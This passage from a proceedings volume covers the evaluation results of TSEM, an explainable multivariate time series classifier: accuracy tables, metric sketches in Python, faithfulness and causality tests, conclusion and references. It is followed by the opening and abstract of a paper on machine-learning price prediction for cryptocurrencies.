Spatiotemporality. The spatiotemporality of an explanation for a multivariate time series means that relevance weights are specified and distributed over each time step of each feature vector. The metric for determining the explanation map's spatiotemporality is as straightforward as ensuring both temporality and spatiality. In other words, the interpretation map must vary in both time and space. For a multivariate time series with N feature vectors and T time steps, spatiality is ensured when the sum of the interpretation map values along the time axis for each feature does not equal 1/N. Similarly, temporality is fulfilled if the sum of the map along the feature axis for each time step t does not equal 1/T. If either property fails, spatiotemporality as a whole fails. These criteria are expressed mathematically in Eqs. 5 and 6, where $X$ denotes the interpretation map, indexed by feature and time step.
$$\sum_{j} X_{nj} \neq \frac{1}{N} \quad \forall n \in \{0, \ldots, N-1\} \tag{5}$$
$$\sum_{i} X_{it} \neq \frac{1}{T} \quad \forall t \in \{0, \ldots, T-1\} \tag{6}$$
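The two quantitative checks of this section, the Chi-square statistic of Eq. 4 and the spatiotemporality criteria of Eqs. 5 and 6, can be sketched as follows. This is a minimal illustration under stated assumptions: the correlations are taken as already computed, the map is a nested list with one row per feature, the criteria are read as "not equal", as in the text, and the function names and the numerical tolerance `tol` are hypothetical.

```python
def chi_square(observed, expected=1.0):
    """Chi-square statistic of Eq. 4.

    observed: correlations between the explanations of randomized inputs
    and the original explanation. expected: the value under the null
    hypothesis, 1.0 for a perfect match.
    """
    return sum((o - expected) ** 2 / expected for o in observed)


def is_spatiotemporal(expl_map, tol=1e-9):
    """Check Eqs. 5 and 6 on an N x T interpretation map.

    Spatiality: no feature's sum over time equals 1/N.
    Temporality: no time step's sum over features equals 1/T.
    """
    num_features = len(expl_map)
    num_steps = len(expl_map[0])
    spatial = all(
        abs(sum(row) - 1.0 / num_features) > tol for row in expl_map
    )
    temporal = all(
        abs(sum(expl_map[n][t] for n in range(num_features))
            - 1.0 / num_steps) > tol
        for t in range(num_steps)
    )
    return spatial and temporal
```

A map that spreads a total relevance of 1 evenly over all cells fails both criteria, whereas a map that concentrates relevance on particular features and time steps passes them. The statistic returned by `chi_square` would still have to be compared against the Chi-square distribution with the appropriate degrees of freedom to obtain a p-value.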
4.4 Experiment Settings
Because XCM and TSEM allow their parameters to be adjusted to a fraction of the data length via time windows computed in multiple layers of the architecture, leaving the window unconstrained would either be unfair to other architectures with a fixed parameter setting or make the models so large that the available computing resources cannot handle the training, possibly resulting in overfitting to the training data. As a consequence, the number of their architectural parameters varies between datasets, and the time window is set to the proportion that results in an absolute value of no more than 500. This is not the case with MTEX-CNN, since its number of parameters is fixed. The other attention-based RNN architectures employ an encoder-decoder structure, which is set to 512 units for both the encoder and decoder modules. The assessment was implemented entirely on Google Colab Pro and the Paperspace Gradient platform. Google Colab Pro provides a Jupyter environment with 24 GB of RAM and a P100 graphics processing unit (GPU) with 16 GB of VRAM for running machine learning models that need a CUDA environment. Similarly, Paperspace's Gradient platform provides a Jupyter Notebook environment with 30 GB of RAM and GPU options up to V100; the evaluations were conducted using a P6000 card with 24 GB of VRAM.
4.5 Experiment Results
The experiment results are presented in two parts: accuracy and interpretability, the latter being further broken down into four sections, namely human visual evaluation, faithfulness, causality and spatiotemporality.
Accuracy. As indicated before, this part evaluates 10 interpretable models on 30 datasets. Table 1 summarizes the findings. According to the table, the TSEM, XCM and STAM models differ markedly from the others in average rank and number of wins/ties. Among them, TSEM has significantly higher accuracy on datasets with long sequences such as Cricket and SelfRegulationSCP2, which have lengths of 1197 and 1152 time steps, respectively [2]. RETAIN also performs well in comparison to the other approaches in terms of average rank. While MTEX-CNN has the lowest average rank, it
Table 1. Accuracy evaluation of the interpretable models for each dataset with TSEM (DSTP is shorthand for DSTP-RNN, DSTP-p is shorthand for DSTP-RNN-Parallel, GeoMAN-l and GeoMAN-g are shorthands for GeoMAN-Local and GeoMAN-Global respectively)
| Datasets | MTEX-CNN | XCM | TSEM | DA-RNN | RETAIN | DSTP-p | DSTP | GeoMAN | GeoMAN-g | GeoMAN-l | STAM |
|---|---|---|---|---|---|---|---|---|---|---|---|
| ArticularyWordRecognition | 0.837 | 0.6 | 0.557 | 0.893 | 0.903 | 0.846 | 0.85 | 0.92 | 0.906 | 0.923 | 0.97 |
| AtrialFibrillation | 0.333 | 0.4667 | 0.4667 | 0.4 | 0.4 | 0.4 | 0.6 | 0.4 | 0.4667 | 0.333 | 0.533 |
| BasicMotions | 0.9 | 0.75 | 0.925 | 0.9 | 0.85 | 0.8 | 0.875 | 0.95 | 0.95 | 0.925 | 0.675 |
| CharacterTrajectories | 0.065 | 0.06 | 0.06 | 0.06 | 0.06 | 0.06 | 0.06 | 0.06 | 0.06 | 0.06 | 0.06 |
| Cricket | 0.083 | 0.583 | 0.722 | 0.208 | 0.208 | 0.153 | 0.194 | 0.194 | 0.208 | 0.194 | 0.75 |
| DuckDuckGeese | 0.2 | 0.54 | 0.4 | 0.42 | 0.32 | 0.28 | 0.26 | 0.36 | 0.4 | 0.38 | 0.42 |
| EigenWorms | 0.42 | 0.428 | 0.42 | 0.42 | 0.42 | 0.42 | 0.42 | 0.42 | 0.42 | 0.42 | 0.412 |
| Epilepsy | 0.601 | 0.804 | 0.891 | 0.348 | 0.312 | 0.384 | 0.384 | 0.333 | 0.341 | 0.326 | 0.565 |
| EthanolConcentration | 0.251 | 0.32 | 0.395 | 0.32 | 0.346 | 0.297 | 0.357 | 0.327 | 0.312 | 0.323 | 0.308 |
| ERing | 0.619 | 0.696 | 0.844 | 0.47 | 0.756 | 0.478 | 0.441 | 0.426 | 0.463 | 0.459 | 0.692 |
| FaceDetection | 0.5 | 0.5 | 0.513 | 0.5 | 0.545 | 0.518 | 0.515 | 0.517 | 0.517 | 0.63 | 0.65 |
| FingerMovements | 0.51 | 0.54 | 0.53 | 0.6 | 0.6 | 0.53 | 0.62 | 0.61 | 0.53 | 0.52 | 0.56 |
| HandMovementDirection | 0.405 | 0.54 | 0.514 | 0.46 | 0.487 | 0.378 | 0.527 | 0.473 | 0.392 | 0.527 | 0.446 |
| Handwriting | 0.051 | 0.095 | 0.117 | 0.051 | 0.061 | 0.055 | 0.051 | 0.051 | 0.037 | 0.051 | 0.099 |
| Heartbeat | 0.8727 | 0.771 | 0.746 | 0.722 | 0.756 | 0.722 | 0.722 | 0.722 | 0.722 | 0.727 | 0.756 |
| JapaneseVowels | 0.238 | 0.238 | 0.084 | 0.084 | 0.084 | 0.084 | 0.084 | 0.084 | 0.084 | 0.084 | 0.084 |
| Libras | 0.067 | 0.411 | 0.372 | 0.206 | 0.372 | 0.201 | 0.228 | 0.233 | 0.272 | 0.172 | 0.589 |
| LSST | 0.315 | 0.155 | 0.315 | 0.315 | 0.315 | 0.315 | 0.315 | 0.315 | 0.315 | 0.315 | 0.316 |
| InsectWingbeat | 0.01 | 0.01 | 0.01 | 0.01 | 0.01 | 0.01 | 0.01 | 0.01 | 0.01 | 0.01 | 0.01 |
| MotorImagery | 0.5 | 0.5 | 0.5 | 0.54 | 0.51 | 0.56 | 0.52 | 0.63 | 0.59 | 0.56 | 0.56 |
| NATOPS | 0.8 | 0.844 | 0.833 | 0.344 | 0.661 | 0.233 | 0.228 | 0.25 | 0.333 | 0.522 | 0.767 |
| PEMS-SF | 0.67 | 0.549 | 0.544 | 0.636 | 0.775 | 0.168 | 0.145 | 0.162 | 0.671 | 0.688 | 0.746 |
| PenDigits | - | 0.721 | 0.686 | 0.323 | 0.746 | 0.112 | 0.11 | 0.331 | 0.35 | 0.384 | 0.888 |
| Phoneme | 0.026 | 0.07 | 0.058 | 0.066 | 0.049 | 0.037 | 0.059 | 0.05 | 0.068 | 0.042 | 0.06 |
| RacketSports | 0.533 | 0.75 | 0.77 | 0.283 | 0.447 | 0.283 | 0.283 | 0.29 | 0.29 | 0.336 | 0.441 |
| SelfRegulationSCP1 | 0.502 | 0.747 | 0.836 | 0.604 | 0.898 | 0.58 | 0.604 | 0.58 | 0.563 | 0.87 | 0.877 |
| SelfRegulationSCP2 | 0.502 | 0.517 | 0.756 | 0.583 | 0.533 | 0.561 | 0.539 | 0.567 | 0.544 | 0.561 | 0.556 |
| SpokenArabicDigits | 0.01 | 0.01 | 0.01 | 0.01 | 0.01 | 0.01 | 0.01 | 0.01 | 0.01 | 0.01 | 0.01 |
| StandWalkJump | 0.333 | 0.467 | 0.467 | 0.4 | 0.333 | 0.467 | 0.333 | 0.467 | 0.467 | 0.533 | 0.533 |
| UWaveGestureLibrary | 0.725 | 0.813 | 0.831 | 0.497 | 0.781 | 0.406 | 0.497 | 0.466 | 0.375 | 0.444 | 0.813 |
| Average Rank | 6.5 | 3.7 | 3.5 | 5.1 | 4.3 | 6.1 | 6.1 | 5.0 | 5.1 | 5.2 | 3.2 |
| Wins/Ties | 5 | 8 | 9 | 2 | 4 | 2 | 4 | 4 | 3 | 3 | 9 |
has the highest number of wins/ties among the methods other than TSEM, XCM and STAM, indicating that this approach is unstable and not ideal for all types of datasets. In comparison, although DA-RNN, GeoMAN-local, and GeoMAN-global are among the techniques with the fewest wins/ties, they have a solid average rank. DSTP-RNN and DSTP-RNN-parallel have the same average rank; however, DSTP-RNN has more wins/ties than DSTP-RNN-parallel, which is consistent with the original research on DSTP-RNN indicating that DSTP-RNN can remember a longer sequence than DSTP-RNN-parallel. Nevertheless, DSTP-RNN and DSTP-RNN-parallel do not outperform the other approaches here, as their original report showed for the regression problem; instead, they are the poorest of all the approaches.
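The two summary rows of Table 1 can be derived from the per-dataset accuracies as sketched below. The tie-handling rule for the ranks is not stated in the text, so the sketch assumes that tied models share the best available rank; the function names and the three-model, three-dataset excerpt (values taken from Table 1) are only for illustration.

```python
def rank_row(scores):
    """Rank the models on one dataset: 1 = highest accuracy.

    Tied models share the best (smallest) rank; this rule is an assumption.
    """
    return {
        model: 1 + sum(1 for other in scores.values() if other > score)
        for model, score in scores.items()
    }


def summarize(table):
    """Return (average rank, wins/ties count) per model.

    table maps a dataset name to a dict of model -> accuracy.
    """
    models = list(next(iter(table.values())))
    avg_rank = {model: 0.0 for model in models}
    wins = {model: 0 for model in models}
    for scores in table.values():
        ranks = rank_row(scores)
        best = max(scores.values())
        for model in models:
            avg_rank[model] += ranks[model] / len(table)
            if scores[model] == best:
                wins[model] += 1  # a tie for first place counts for each model
    return avg_rank, wins


# Excerpt of Table 1: three models on three datasets.
excerpt = {
    "Cricket": {"XCM": 0.583, "TSEM": 0.722, "STAM": 0.75},
    "NATOPS": {"XCM": 0.844, "TSEM": 0.833, "STAM": 0.767},
    "Libras": {"XCM": 0.411, "TSEM": 0.372, "STAM": 0.589},
}
average_ranks, win_counts = summarize(excerpt)
```

On this excerpt STAM wins two datasets and XCM one, which illustrates why the two summaries can disagree: a model such as TSEM can hold a reasonable average rank without winning any single dataset.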
Fig. 4. The critical difference plot of the MTS classifiers on the UEA datasets with alpha equal to 0.05.
While comparing average ranks and wins/ties scores helps to determine a model's quality, the two measurements may disagree. The average rank is therefore also shown in a critical difference diagram to provide further insight. The statistical test shown in Fig. 4 is the Bonferroni-Dunn test with an alpha of 0.05 over 30 datasets, which corresponds to the total number of datasets in the UEA collection. Figure 4 suggests that STAM, TSEM and XCM are the top three methods in terms of accuracy, and that they belong to the same group as RETAIN, DA-RNN and all the variants of GeoMAN, which differs significantly from the remaining three methods.
Qualitative Evaluation. Regarding the CNN-based architectures analyzed in this research, ten different CAM-based methods are evaluated for the explainability of the models: CAM [25], Grad-CAM [22], Grad-CAM++ [4], Smooth Grad-CAM++ [18], XGrad-CAM [8], Ablation-CAM [21], Score-CAM [24], Integrated Score-CAM [16], Activation-Smoothed Score-CAM [23] and Input-Smoothed Score-CAM [23]. However, only CAM, Grad-CAM++ and XGrad-CAM are examined in this part owing to the superiority of these three methods. They are then visually compared, within a given context, with the attention representation vectors of the attention-based RNN architectures. Here, an example from the UWaveGestureLibrary dataset (shown in Fig. 5) illustrates a right turn downhill after a straight walk onwards. As previously mentioned, without a sanity check grounded in human understanding, the explanations for a multivariate time series would be hard to judge. In other words, it must be unambiguous what every element of the multivariate time series represents. For example, the input data in Fig. 5 depicts a multivariate time series from the UWaveGestureLibrary dataset that corresponds to the three axes of an accelerometer measuring a staged action, which is designated by label 1 in the category list. Knowing what each component represents, for example that the blue line represents the x-axis values of the acceleration sensor, makes it clearer why the components oscillate in certain patterns, as shown here by the blue line's oscillation following the x-axis variation of the steep right turn as labeled. In particular, the action intervals for class 1 are denoted with great precision. Indeed, the action would differ from person to person and from time to time, but in general, it can be
Fig. 5. A UWaveGestureLibrary class 1 instance with semantic segmentation
divided into five states and four stages based on the change in acceleration in the x-axis values of the sensor, as reported by the uphill and downhill patterns of the blue line and of the green line. The five states are denoted by the letters O, A, B, C and D, which correspond to the resting state, the beginning state, the switching state, the halting state, and the terminating state, in that order. The four stages are denoted by OA, AB, BC and CD, which represent the transitory stage, the first-direction running stage, the second-direction running stage, and the concluding stage, respectively. It is necessary to distinguish the transitory and concluding stages because an action is neither initiated nor terminated at the exact moment the device starts or stops recording the signal. All of the states and stages are highlighted in both the multivariate time series and its label in order to demonstrate the sensible interconnections between them. An interpretation map is therefore more interesting if it highlights the critical points located between states A and B; it would be meaningless if it stressed the transitory stage OA or the concluding stage CD because, logically, a model should not choose class 1 over other classes simply because of its longer transitory stage, for example. In general, according to Fig. 6, the post-hoc explainability approaches based on CAM yield more continuous interpretation maps for XCM than the explanations obtained from attention-based RNN models. The difference appears to stem from the different ways in which CNNs and RNNs extract the learned features: a CNN is able to provide a local explanation specific to the input instance, whereas an RNN is believed to yield a global explanation independent of the specific input instance in question. For the sake of this discussion, the explanation map produced by attention in recurrent networks is attributed to the category into which the input instance as a whole is classified, and this category is represented by a node in the instance. Unlike RNN,
Fig. 6. Explanations from several explainable models for a UWaveGestureLibrary class 1 instance. MTEX-CNN, XCM and TSEM are explained post hoc by CAM, XGrad-CAM and Grad-CAM++. Explanations for the attention-based RNN methods are their spatiotemporal attention vectors. The red lines show the regions of the input most highly activated for class 1 as their predictions.
CNN does not have the capacity to memorize; the highlighted areas are simply those parts of the input instance that are activated when the CNN encounters a label. As a result, the interpretation based on CAM relies strongly on the input signal.
Faithfulness. As a contrastive pair, the two assessment metrics in each test are shown on a two-dimensional diagram, together with the accuracy of each model, which is represented by the size of the circle at the corresponding coordinates. When high-accuracy interpretable models are compared against low-accuracy interpretable models, the accuracy may reveal how the explanations are affected. The Average Drop and Average Increase metrics are displayed as percentages ranging from 0 to 100, and each point is represented by two coordinates that correspond to the Average Drop and the Average Increase. Because the Average Drop and Average Increase are inversely related, all of the points are expected to follow a trend parallel to the line y = -x. Considering that x represents the Average Drop value and y represents the Average Increase
Fig. 7. The average drop - average increase diagram for the UWaveGestureLibrary dataset. Accuracy is shown as proportional to the size of the circles. (The lower the average drop, the more faithful the method; the opposite holds for the average increase.)
value, the bottom right is the lowest-performance zone, while the top left is the highest-performance zone of the diagram. Taking into account the wide range of accuracy, it is rather simple to determine which technique provides the most accurate explanation for a model's decision. Figure 7 depicts the distribution of the interpretation techniques in terms of Average Drop and Average Increase, in percentages. All of the points are color-coded, with red and yellow denoting the CAM-based interpretations for XCM and TSEM, respectively. Blue represents MTEX-CNN, while the remaining colors represent the attention-based approaches (which are not shown here). In general, the farther to the right a point lies, the poorer the implied performance. As previously mentioned, the worst approaches are clustered together at the bottom right, where the Average Increase is at its lowest and the Average Drop is at its greatest. While both MTEX-CNN and STAM have high accuracy (as shown by the size of the circles), the interpretations for MTEX-CNN and the attention vector for STAM have the lowest fidelity to their predictions.
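The two metrics discussed above can be sketched as follows. This is a minimal illustration that assumes the common definitions introduced with Grad-CAM++ [4]: Average Drop is the mean relative loss in class score when the model sees only the explanation-masked input, and Average Increase is the share of instances whose score rises. The function name and the example scores are hypothetical, and the authors' exact implementation may differ.

```python
from typing import Sequence, Tuple


def average_drop_and_increase(
    full_scores: Sequence[float],
    masked_scores: Sequence[float],
) -> Tuple[float, float]:
    """Return (Average Drop %, Average Increase %).

    full_scores[i]   : class score of instance i on the original input
    masked_scores[i] : class score of instance i when only the regions
                       highlighted by the explanation map are kept
    """
    if len(full_scores) != len(masked_scores) or not full_scores:
        raise ValueError("score lists must be non-empty and of equal length")
    n = len(full_scores)
    # Relative score loss per instance, clipped at zero so gains do not count.
    drop = sum(max(0.0, y - o) / y for y, o in zip(full_scores, masked_scores)) / n
    # Fraction of instances whose score increases on the masked input.
    increase = sum(1 for y, o in zip(full_scores, masked_scores) if o > y) / n
    return 100.0 * drop, 100.0 * increase


# Made-up scores for four instances, for illustration only.
drop_pct, increase_pct = average_drop_and_increase(
    [0.8, 0.5, 0.9, 0.4], [0.4, 0.6, 0.9, 0.1]
)
```

A faithful explanation would be expected to give a low first value and a high second value, which corresponds to the top-left zone of the diagram.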
Fig. 8. The deletion/insertion AUC diagram for the UWaveGestureLibrary dataset. Accuracy is shown as proportional to the size of the circles. The diagram uses a log scale to magnify the distance between circles for clarity. (The lower the deletion AUC score, the more faithful the method; the opposite holds for the insertion AUC score.)
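The deletion and insertion AUC scores plotted in Fig. 8 could be computed along the following lines. This is a simplified sketch for a single univariate sequence: data points are ranked by importance, removed from (or added to) the input one at a time, and the model score is recorded after each step. The `model` callable, the zero baseline and the toy linear model in the usage lines are all assumptions made for illustration, not the authors' setup.

```python
from typing import Callable, List, Sequence, Tuple


def curve_auc(scores: Sequence[float]) -> float:
    """Trapezoidal area under a curve whose x-axis is rescaled to [0, 1]."""
    steps = len(scores) - 1
    return sum((scores[i] + scores[i + 1]) / 2.0 for i in range(steps)) / steps


def deletion_insertion_auc(
    model: Callable[[List[float]], float],
    x: Sequence[float],
    importance: Sequence[float],
    baseline: float = 0.0,
) -> Tuple[float, float]:
    """Return (deletion AUC, insertion AUC) for one input sequence."""
    # Most important data points first.
    order = sorted(range(len(x)), key=lambda i: importance[i], reverse=True)
    deleted = list(x)                 # starts as the original input
    inserted = [baseline] * len(x)    # starts as an "empty" sequence
    deletion_scores = [model(deleted)]
    insertion_scores = [model(inserted)]
    for i in order:
        deleted[i] = baseline
        inserted[i] = x[i]
        deletion_scores.append(model(deleted))
        insertion_scores.append(model(inserted))
    return curve_auc(deletion_scores), curve_auc(insertion_scores)


# Hypothetical toy model: a fixed weighted sum clipped to [0, 1].
WEIGHTS = [0.5, 0.3, 0.2, 0.0]


def toy_model(seq: List[float]) -> float:
    return min(1.0, max(0.0, sum(w * v for w, v in zip(WEIGHTS, seq))))


deletion_auc, insertion_auc = deletion_insertion_auc(
    toy_model, [1.0, 1.0, 1.0, 1.0], importance=WEIGHTS
)
```

In this toy case the importance ranking matches the model's weights exactly, so the deletion curve falls quickly and the insertion curve rises quickly, which is the behaviour a faithful explanation is expected to show.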
The Insertion and Deletion curves reflect the change in a model's prediction score when the most essential data points are gradually introduced into an empty sequence or gradually removed from the original input, respectively. The area under each curve serves as a measure of how quickly the curve moves. The area under the curve (AUC) of a Deletion curve is expected to be as small as possible, showing a rapid drop in model accuracy as soon as the most relevant data points begin to be eliminated. In contrast, the AUC of an Insertion curve should be as large as possible, which indicates that accuracy increases as soon as the first, most essential data points are added. Figure 8 depicts the relationship between the Deletion AUC and Insertion AUC values. Overall, there are no evident patterns relating the AUC values to the accuracy of any approach. The majority of the techniques are grouped at a nearly equal Deletion AUC of around 0.125 regardless of their Insertion AUC values; however, the Grad-CAM family of approaches for MTEX-CNN stands out with remarkable Deletion AUC scores of about 0.07. Furthermore, not only
do they have low Deletion AUC scores, but they also have a high Insertion AUC score of around 0.3. STAM and the remaining CAM-based methods for MTEX-CNN are located in the same Insertion AUC range, but with Deletion AUC scores that are almost double those of the Grad-CAM family for MTEX-CNN. Similarly, the RETAIN interpretation has the highest Insertion AUC score, approximately 0.5, which is four times higher than that of the XCM interpretations and of the rest of the attention-based techniques' interpretations, with the exception of STAM. While the CAM-based explanations for XCM have nearly the same Insertion AUC score as GeoMAN, GeoMAN-local, GeoMAN-global, DA-RNN, DSTP-RNN and DSTP-RNN-parallel, they have lower Deletion AUC scores than the attention maps of these models. It is hoped that the fidelity of the CAM-based explanations for TSEM will be at least as good as that of the XCM architecture, since TSEM is a modified and corrected version of the XCM design. Indeed, as seen in Figs. 7 and 8, the cluster for the TSEM interpretations in both diagrams is distributed in a manner that is virtually identical to that of XCM. TSEM, on the other hand, performs somewhat better in terms of two metrics: Average Increase and Insertion AUC. This implies that the TSEM interpretations pay more attention to the data points that are more meaningful in the multivariate time series. Most notably, the original CAM approach extracts an explanation map for TSEM with the smallest Average Drop of all the methods tested.
Causality. When attempting to reason about an effect in relation to a cause, the significance of causality cannot be overstated. Specifically, the effect is the explanation map and its cause is the input data, and the two are connected by a model that acts as a proxy between the cause and the effect.
For example, in contrast to the regression connection between a model's input and output, explanation maps are produced by a mix of inputs, model parameters, and outputs. While the model parameters and the output are kept constant in this assessment, randomization is applied to two axes of the multivariate time series input. According to Fig. 9, the CAM-based explanations for TSEM on the 320 instances of the UWaveGestureLibrary test set exhibit patterns similar to those of the XCM explanations. Specifically, neither the Score-CAM variants nor the Ablation-CAM variants pass the causality test. The distinction between TSEM and both MTEX-CNN and XCM is that TSEM renders the original CAM approach causal, which does not happen with MTEX-CNN or XCM. Additionally, the XGrad-CAM explanations for TSEM are non-causal. Although the Ablation-CAM explanation technique fails for both XCM and TSEM, the failure is more pronounced for TSEM, where the proportion of temporal non-causal data points surpasses the 10% threshold. In general, only three approaches satisfy the causality criterion for TSEM: Grad-CAM++, Smooth Grad-CAM++, and the original CAM. This is considered a good performance because, according to Fig. 9, almost 70% of the methods do not retain causality.
Fig. 9. Bar chart of the non-causal proportion of the UWaveGestureLibrary test set inferred by the TSEM CAM-based explanations versus the other interpretable methods. The lower the proportion, the better the causality of a method; it must be below 10% (illustrated by the red line) for the method to pass the causality test.
Spatiotemporality. This property is stated explicitly in Eqs. 5 and 6, which relate to the spatiality and temporality tests, respectively. If both of these equations hold for an interpretation map, the map is deemed to possess the spatiotemporal quality. Because the values in an explanation map do not add up to 1, they must be normalized before the criterion equations are applied. This is done by dividing each value by the sum of the whole map. All CAM-based interpretations for XCM, TSEM and MTEX-CNN, as well as the attention-based interpretations, pass this set of tests. Because there are no negative cases, the findings for each approach are omitted.
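The normalization step described above, dividing each value by the sum of the whole map, might look like the sketch below. The map is assumed to be a list of rows with non-negative entries (for example, one row per variable and one column per time step); the function name is hypothetical and the criterion equations themselves are not reproduced here.

```python
from typing import List


def normalize_map(explanation_map: List[List[float]]) -> List[List[float]]:
    """Rescale an explanation map so that all of its values sum to 1."""
    total = sum(sum(row) for row in explanation_map)
    if total == 0:
        raise ValueError("cannot normalize a map whose values sum to zero")
    return [[value / total for value in row] for row in explanation_map]


# Made-up 2 x 2 map, for illustration only.
normalized = normalize_map([[1.0, 3.0], [2.0, 4.0]])
```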
5 Conclusion and Outlook
After a thorough analysis of the currently available interpretable methods for MTS classification, the Temporally weighted Spatiotemporal Explainable network for Multivariate Time Series Classification, or TSEM for short, is developed on the basis of the successful XCM in order to address some of XCM's shortcomings. Specifically, XCM does not permit concurrent extraction of spatial and temporal explanations because they are separated into two parallel branches. In contrast, TSEM reweights the spatial information obtained in the first branch using the temporal information learnt by the recurrent layer in the second parallel branch. This is regarded as a more productive approach than XCM in that it extracts real temporality from the data rather than pseudo-temporality from the correlation of time-varying values at a location. It also lends credence to an explanation that includes maps of the relative significance of temporal and spatial features. As a result, it is expected to provide a more compact and exact interpretation map. Indeed, TSEM outperforms XCM in terms of accuracy across the 30 datasets in the UEA archive and in terms of explainability on the UWaveGestureLibrary dataset. This study focuses only on model-specific interpretable approaches and makes no comparisons with model-independent methods. It would therefore be interesting to analyze TSEM with these methods using the same evaluation set of interpretability metrics. Beyond that, future work on TSEM could use concept embedding to encode tangible aspects into knowledge about a concept, and then incorporate neuro-symbolic techniques in order to provide a more solid explanation of its predictions. In addition, causal inference has to be considered in order to remove any false connection between the logits and the feature maps. This would help to strengthen the actual explanation and to remove any confounding variables that may be present.
References
1. Assaf, R., Giurgiu, I., Bagehorn, F., Schumann, A.: MTEX-CNN: multivariate time series explanations for predictions with convolutional neural networks. In: 2019 IEEE International Conference on Data Mining (ICDM), pp. 952–957. IEEE (2019)
2. Bagnall, A., et al.: The UEA multivariate time series classification archive (2018). arXiv preprint arXiv:1811.00075 (2018)
3. Brendel, W., Bethge, M.: Approximating CNNs with bag-of-local-features models works surprisingly well on imagenet. arXiv preprint arXiv:1904.00760 (2019)
4. Chattopadhay, A., Sarkar, A., Howlader, P., Balasubramanian, V.N.: Grad-CAM++: generalized gradient-based visual explanations for deep convolutional networks. In: 2018 IEEE Winter Conference on Applications of Computer Vision (WACV), pp. 839–847. IEEE (2018)
5. Chen, C., Li, O., Tao, D., Barnett, A., Rudin, C., Su, J.K.: This looks like that: deep learning for interpretable image recognition. In: Advances in Neural Information Processing Systems 32 (2019)
6. Choi, E., Bahadori, M.T., Sun, J., Kulas, J., Schuetz, A., Stewart, W.: Retain: an interpretable predictive model for healthcare using reverse time attention mechanism. In: Advances in Neural Information Processing Systems 29 (2016)
7. Fauvel, K., Lin, T., Masson, V., Fromont, É., Termier, A.: XCM: an explainable convolutional neural network for multivariate time series classification. Mathematics 9(23), 3137 (2021)
8. Fu, R., Hu, Q., Dong, X., Guo, Y., Gao, Y., Li, B.: Axiom-based Grad-CAM: towards accurate visualization and explanation of CNNs. arXiv preprint arXiv:2008.02312 (2020)
9. Gangopadhyay, T., Tan, S.Y., Jiang, Z., Meng, R., Sarkar, S.: Spatiotemporal attention for multivariate time series prediction and interpretation. In: 2021 IEEE International Conference on Acoustics, Speech and Signal Processing (ICASSP), ICASSP 2021, pp. 3560–3564. IEEE (2021)
10. Holzinger, A., Goebel, R., Fong, R., Moon, T., Müller, K.R., Samek, W.: xxAI - beyond explainable artificial intelligence. In: Holzinger, A., Goebel, R., Fong, R., Moon, T., Müller, K.R., Samek, W. (eds.) xxAI - Beyond Explainable AI. Lecture Notes in Computer Science, vol. 13200, pp. 3–10. Springer, Cham (2022). https://doi.org/10.1007/978-3-031-04083-2_1
11. Hu, D.: An introductory survey on attention mechanisms in NLP problems. In: Bi, Y., Bhatia, R., Kapoor, S. (eds.) IntelliSys 2019. AISC, vol. 1038, pp. 432–448. Springer, Cham (2020). https://doi.org/10.1007/978-3-030-29513-4_31
12. Jain, S., Wallace, B.C.: Attention is not explanation. arXiv preprint arXiv:1902.10186 (2019)
13. Koh, P.W., et al.: Concept bottleneck models. In: International Conference on Machine Learning, pp. 5338–5348. PMLR (2020)
14. Liang, Y., Ke, S., Zhang, J., Yi, X., Zheng, Y.: GeoMAN: multi-level attention networks for geo-sensory time series prediction. In: IJCAI 2018, pp. 3428–3434 (2018)
15. Liu, Y., Gong, C., Yang, L., Chen, Y.: DSTP-RNN: a dual-stage two-phase attention-based recurrent neural network for long-term and multivariate time series prediction. Expert Syst. Appl. 143, 113082 (2020)
16. Naidu, R., Ghosh, A., Maurya, Y., Kundu, S.S., et al.: IS-CAM: integrated score-CAM for axiomatic-based explanations. arXiv preprint arXiv:2010.03023 (2020)
17. Nauta, M., van Bree, R., Seifert, C.: Neural prototype trees for interpretable fine-grained image recognition. In: Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition, pp. 14933–14943 (2021)
18. Omeiza, D., Speakman, S., Cintas, C., Weldermariam, K.: Smooth grad-CAM++: an enhanced inference level visualization technique for deep convolutional neural network models. arXiv preprint arXiv:1908.01224 (2019)
19. Pfeifer, B., Secic, A., Saranti, A., Holzinger, A.: GNN-subnet: disease subnetwork detection with explainable graph neural networks. bioRxiv (2022)
20. Qin, Y., Song, D., Chen, H., Cheng, W., Jiang, G., Cottrell, G.: A dual-stage attention-based recurrent neural network for time series prediction. arXiv preprint arXiv:1704.02971 (2017)
21. Ramaswamy, H.G., et al.: Ablation-CAM: visual explanations for deep convolutional network via gradient-free localization. In: Proceedings of the IEEE/CVF Winter Conference on Applications of Computer Vision, pp. 983–991 (2020)
22. Selvaraju, R.R., Cogswell, M., Das, A., Vedantam, R., Parikh, D., Batra, D.: Grad-CAM: visual explanations from deep networks via gradient-based localization. In: Proceedings of the IEEE International Conference on Computer Vision, pp. 618–626 (2017)
23. Wang, H., Naidu, R., Michael, J., Kundu, S.S.: SS-CAM: smoothed score-CAM for sharper visual feature localization. arXiv preprint arXiv:2006.14255 (2020)
24. Wang, H., et al.: Score-CAM: score-weighted visual explanations for convolutional neural networks. In: Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition Workshops, pp. 24–25 (2020)
25. Zhou, B., Khosla, A., Lapedriza, A., Oliva, A., Torralba, A.: Learning deep features for discriminative localization. In: Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition, pp. 2921–2929 (2016)
AI in Cryptocurrency
Alexander I. Iliev1,2(✉) and Malvika Panwar1
1 SRH University Berlin, Charlottenburg, Germany
[email protected], {3105481, malvika.panwar}@stud.srh-campus-berlin.de
2 Institute of Mathematics and Informatics, Bulgarian Academy of Sciences, 8 Acad. Georgi Bonchev Street, 1113 Sofia, Bulgaria
Abstract. This study investigates the predictability of six significant cryptocurrencies over the upcoming two days using AI techniques, namely the machine learning algorithms random forest and gradient boosting. The study shows that machine learning can serve as a means of predicting cryptocurrency prices. A machine learning system learns from past data, constructs prediction models, and predicts the output for new data whenever it receives it. The accuracy of the predicted output is influenced by the quantity of data: the more data there is, the better the model can predict the output. Using the accuracy score as the performance metric for this study, we find that random forest and gradient boosting, respectively, performed well for cryptocurrencies such as Solana (98.07%, 98.14%), Binance (96.56%, 96.85%), and Ethereum (96.61%, 96.60%), with the exception of Tether (0.38%, 12.35%) and USD coin (-0.59%, 1.48%). The results demonstrate that both algorithms work effectively for the majority of the cryptocurrencies, and that performance might be further improved by using deep learning algorithms such as ANN, RNN or LSTM.
Keywords: Cryptocurrency · Artificial intelligence · Machine learning · Deep learning · ANN · RNN · LSTM
